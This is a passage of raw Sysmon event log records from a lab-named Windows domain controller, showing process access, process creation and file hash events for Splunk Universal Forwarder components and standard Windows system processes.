Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.480{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.416{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D8F1299C63FE0A0F838E21B1268A353,SHA256=679EEFABA27D71DB7ACE6810D79A832947C6759A7D670B0CD4AA7F721C586695,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000011538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.621{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.463{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D69EC1E2956E5B02F54E7AC65B5172,SHA256=F6670068D6C880D2283085F8F9B0BD3AAFC4AC4213B703C556FF5938ED2E537E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000011539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:05.494{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6ACE04422A594E211B8D0616AF8F47,SHA256=34B1AA02732575D121A72D7B03A4010C4B3B2C58ED212BC630084915C25598A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.902{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.526{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD331B01ADF607BF4A6271313A7FC633,SHA256=AB5E9FF257B76F648D496A15FB9AF39425223A4C827925E8F5FB8CE854401DCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:06.479{266CAFBE-66DA-6064-8501-00000000AE01}68886872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.323{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
